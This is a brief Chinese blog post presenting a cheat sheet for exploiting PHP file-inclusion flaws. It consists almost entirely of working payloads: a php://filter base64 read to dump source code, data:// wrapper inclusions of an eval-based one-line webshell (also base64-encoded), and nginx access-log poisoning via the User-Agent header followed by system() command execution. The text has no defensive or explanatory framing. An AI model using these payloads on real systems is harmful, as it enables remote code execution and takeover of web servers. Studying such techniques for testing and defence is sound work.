关于文件包含

关于文件包含

231 浏览 | 2021-09-19 | 阅读时间: 约 1 分钟 | 分类: 杂 | 标签:

请注意，本文编写于 281 天前，最后修改于 281 天前，其中某些信息可能已经过时。

直接读

?file=php://filter/read=convert.base64-encode/resource=

考虑data方式
data://
数据流构造器，将读取后面base编码字符串后解码的数据作为数据流的输入
包含木马

?file=data://text/plain,<?php @eval($_POST['cmd'])?>
?file=data://text/plain;base64,PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk/Pg==

随后紧跟一个post传参即可

先想办法随便写一个一句话木马进去<?php eval($_POST[1]);?> 比如传参或者ua头里插入日志
然后包含进

/var/log/nginx/access.log

之后传递 1=system('');命令即可

发表评论

全部评论

还没有任何评论，你来说两句呐!